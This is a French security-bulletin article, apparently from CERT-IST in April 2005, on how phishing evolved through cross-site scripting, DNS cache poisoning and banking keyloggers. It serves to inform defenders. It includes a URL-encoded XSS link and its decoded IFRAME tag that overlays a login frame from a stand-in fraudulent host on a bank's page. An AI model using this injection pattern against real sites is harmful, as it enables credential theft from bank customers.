Evolution des techniques de "phishing" : le "pharming", les "keyloggers", etc
Date : 15 Avril 2005
L'ampleur que prend le phénomène de "phishing", grâce aux gains substantiels qu'un organisme ou une personne malveillante peut en retirer, contribue à l'amélioration permanente des techniques utilisées afin d'acquérir des informations sensibles (bancaires en général) de la part des victimes.
Ainsi deux techniques présentant des propriétés de furtivité plus poussées, mais connues depuis quelques temps, sont de nos jours de plus en plus utilisées sur Internet :
- le "phishing" et le problème de type "Cross-Site Scripting",
- le "phishing" et la pollution de cache DNS ("DNS poisoning") : le "pharming",
- le "phishing" et les chevaux de Troie de type "keylogger".
Le "phishing" et le "Cross-Site Scripting"
Les vulnérabilités de type "Cross-Site Scripting" permettent d'utiliser une machine sensible à ce problème comme "rebond" pour tromper la vigilance de l'utilisateur lors d'une navigation web ou lui voler des informations personnelles telles que des cookies.
Cette technique a été détaillée dans l'article " Vulnérabilités de type Cross-site Scripting " du Bulletin Sécurité n°47 du mois d'août 2001.
Les vulnérabilités de type "Cross-Site Scripting" sont présentes (puis corrigées) dans de nombreux produits du marché, mais également dans les applications métier ouvertes sur Internet. Elles sont essentiellement dues au fait que ces logiciels ne vérifient pas correctement les données utilisateur.
Voici ci-dessous quelques exemples de failles de type "Cross-Site Scripting" :
- CERT-IST/AV-2005.094 : Vulnérabilité dans le serveur d'application "Sun Java System"
- CERT-IST/AV-2005.069 : Vulnérabilité dans l'utilitaire d'indexation de pages web "Htdig" sous Unix
- CERT-IST/AV-2005.058 : Vulnérabilité dans les produits "Windows SharePoint Services" et "SharePoint Team Services" de Microsoft
- CERT-IST/AV-2004.286 : Multiples vulnérabilités dans ColdFusion MX et JRun de Macromedia
Cette technique "attrayante" est depuis quelque temps exploitée pour mettre en œuvre du "phishing". En effet, des applications bancaires en ligne, si elles sont sensibles à ce problème, peuvent être utilisées à travers des e-mails de "phishing" comportant un lien (URL) spécifique comme le montre l'exemple suivant :
http://www.banque-en-ligne.com/legal/do.asp?name=%3Ciframe+style%3D%22top%3A120%3B+left%
3A0%3B+position%3Aabsolute%3B%22+FRAMEBORDER%3D%220%22+BORDER%3D%220%22+
width%3D900+height%3D650+src%3D%22http%3A%2F%2Fwww.banque-frauduleuse.biz%22%3E
Dans le cas où le script ASP "http://www.banque-en-ligne.com/legal/do.asp" est vulnérable au "Cross-Site Scripting", l'URL ci-dessus permet d'afficher au milieu de la page légitime du site "www.banque-en-ligne.com" une zone provenant d'un site frauduleux "www.banque-frauduleuse.biz". Si cette zone contient une bannière "identifiant"/"mot de passe", et que l'utilisateur saisit ces informations (parce qu'elles lui sont demandées par SA banque), alors le site frauduleux obtient un accès à son compte bancaire.
Nota : Le code HTML inclus dans l'URL donnée ci-dessus est le tag "IFRAME" suivant :
<iframe style="top:120; left:0; position:absolute;" FRAMEBORDER="0" BORDER="0" width=900 height=650 src=http://www.banque-frauduleuse.biz>
Le "phishing" et la pollution de cache DNS ("DNS poisoning") : le "pharming"
Le "pharming" est une nouvelle technique utilisée pour le détournement de données personnelles qui ne nécessite pas l'envoi d'un e-mail malveillant à la victime ("phishing"), mais qui s'appuie sur des failles dans les serveurs de noms (DNS) afin de rediriger la victime vers un site web frauduleux alors qu'elle a saisi dans son navigateur une URL légitime. Les failles utilisées sont de type "pollution de cache DNS" ("DNS cache poisoning").
La propriété très intéressante des attaques par "pharming" est le fait que l'on n’attaque plus les utilisateurs individuellement en leur envoyant des e-mails (sans savoir s'ils ont ou non un compte bancaire "en ligne"), mais collectivement en attaquant par exemple un serveur DNS.
Nota : Le terme "pharming" semble provenir du monde biomédical (combinaison de "farming" et de "pharmaceuticals"), où il désigne une technique d'altération génétique. Dans le monde du "hacking", le "pharming" désigne donc une attaque par mutation réalisée par implentation d'un gène étranger dans un serveur (DNS) "ordinaire".
Le "pharming" utilise généralement des vulnérabilités de type "pollution de cache" permettent de modifier le contenu du cache d'un serveur de noms pour que ce dernier attribue une nouvelle adresse IP frauduleuse à un nom de machine (site web) légitime.
Par exemple, si le serveur web de la banque "www.ma-banque.com" a pour adresse IP X.X.X.X, une attaque par "pollution de cache" modifiera dans le cache du serveur DNS l'adresse IP associée au nom "www.ma-banque.com" en Y.Y.Y.Y.
Par la suite, tout utilisateur qui utilise le serveur DNS pollué se verra répondre pour accéder à l'URL "www.ma-banque.com" l'adresse IP Y.Y.Y.Y référençant un site frauduleux, ayant la même présentation que le site institutionnel "www.ma-banque.com".
Des attaques par "pollution de cache" ont été confirmées au mois de mars par le SANS (ISC). Elles ciblaient entre autres les équipements de Symantec, pour lesquels il existe deux vulnérabilités connues :
- CERT-IST/AV-2005.104 : Vulnérabilité dans le serveur de relayage "DNSd" de certains logiciels Symantec
- CERT-IST/AV-2004.197 : Vulnérabilité dans le service DNS des gardes-barrière de Symantec
et avaient pour objet de détourner les sites web "google.com", "ebay.com"et " weather.com" vers des serveurs malveillants.
On peut aussi noter que ce type de comportement (redirection des connexions des utilisateurs vers des sites malveillants) peut être également obtenu à travers des chevaux de Troie qui viennent modifier les fichiers "hosts" des systèmes Microsoft (fichier de correspondance entre adresse IP et nom de machine), afin de coder en dur sur le poste de la victime les redirections malveillantes.
On peut également imaginer de corrompre un cache web (par exemple, sur le proxy web sortant d'une entreprise) plutôt qu'un cache DNS, pour afficher une fausse page d'accueil lorsqu'un internaute se connecte à sa banque depuis son entreprise. Si on étudie le nombre de vulnérabilités récentes dans lesquelles des corruptions de caches web ont été pointés, on comprend que le risque est réel :
- CERT-IST/AV-2005.058 : Vulnérabilité dans les produits "Windows SharePoint Services" et "SharePoint Team Services" de Microsoft
- CERT-IST/AV-2005.046 : Multiples vulnérabilités dans le serveur "Squid" version 2.5-STABLE
- CERT-IST/AV-2005.041 : Vulnérabilité dans le serveur "Squid" version 2.5-STABLE
- CERT-IST/AV-2004.349 : Vulnérabilité dans les produits Microsoft "ISA Server 2000" et "Proxy Server 2.0"
Le "phishing" et les chevaux de Troie de type "keylogger"
Parallèlement aux techniques évoquées ci-dessus, le vol de données bancaire se développe aussi désormais au moyen de vers ou des chevaux de Troie conçus pour récupérer des données bancaires (identifiants/mot de passe de connexions) des utilisateurs. Ces codes malicieux mettent en oeuvre des "keyloggers". Il s'agit d'une technique ancienne permettant d'enregistrer les touches frappées au clavier et de les enregistrer à l'insu de l'utilisateur (ces "keyloggers" sont utilisés par des pirates pour récupérer des informations confidentielles des utilisateurs du poste de travail, comme des mots de passe).
Ces codes malveillants sont de plus en plus évolués puisqu'ils permettent de récupérer uniquement des données provenant des sessions utilisateur lors des transactions financières et bancaires. Une fois enregistrées, ces données sont ensuite envoyées vers un serveur FTP sur Internet (cas du cheval de Troie "SpyBank") ou vers une adresse e-mail spécifique (cas du cheval de Troie "Stawin"). Pour cibler les données récoltées, ces chevaux de Troie recherchent spécifiquement les données tapées par l'utilisateur dans des fenêtres dont le titre correspond à un nom de banque ou contenant des chaînes de caractères relatives au monde bancaire. Ainsi, le ver "Maslan", découvert en décembre 2004, enregistre les événements clavier des fenêtres "Internet Explorer" qui contiennent certaines chaînes de caractères ("Evocash", "e-bullion", "e-gold", "mail", "bank", "trade", "paypal").
Conclusion :
Les attaques par "phishing/pharming" sont devenues au fil du temps une véritable préoccupation du domaine bancaire et des sociétés de commerce en ligne. Leur complexité permet des scénarios de plus en plus furtifs et les préjudices commencent à avoir un impact vraiment significatif sur ces organismes. Outre les détournements des fonds de clients victimes de ce phénomène, l'image des sociétés impactées par les campagnes de "phishing" est parfois gravement mise à défaut. Une étude au Etats-Unis a montré que 6% des personnes interrogées avaient changés de banque pour éviter d'être victimes de ce genre de fraude. Microsoft a déposé une plainte contre 117 sites de phishing.
Certains organismes proposent dorénavant à leurs clients de nouveaux moyens de sécurité à travers une authentification forte par jeton/clé USB/carte à puce afin d'éviter ce type de désagrément.
Mais le principal effort reste encore dans l'éducation des internautes afin de les sensibiliser sur les dangers de la navigation web et les bons réflexes à adopter.
Pour plus d'informations :
- Article du Journal du Net : http://solutions.journaldunet.com/0503/050317_phishing.shtml
- Articles sur le "pharming" :
- Archives de l’"Internet Storm Center" (SANS) ;
- Sondage sur les conséquences du "phishing" aux Etats-Unis : http://www.techweb.com/wire/ebiz/159902238
- Cheval de Troie "SpyBank" : CERT-IST/AV-2005.078
- Cheval de Troie "Stawin" : CERT-IST/AV-2004.026
- Ver "Maslan" : CERT-IST/AV-2004.379
- Article de "ZDNet" du 21 mars 2005 : http://news.zdnet.com/2100-1009_22-5628512.html
Articles des précédents bulletins Cert-IST traitant du "phishing" :
- Etude sur l'impact du "phishing" sur Internet de CipherTrust (article Cert-IST du Bulletin Sécurité n°89)
- Comment traiter un incident de type "phishing" bancaire ? (article Cert-IST du Bulletin Sécurité n°88)
- Guide NGS pour la lutte contre le phishing (article Cert-IST du Bulletin Sécurité n°84)
- Attaques de type "Phishing" (article Cert-IST du Bulletin Sécurité n°80)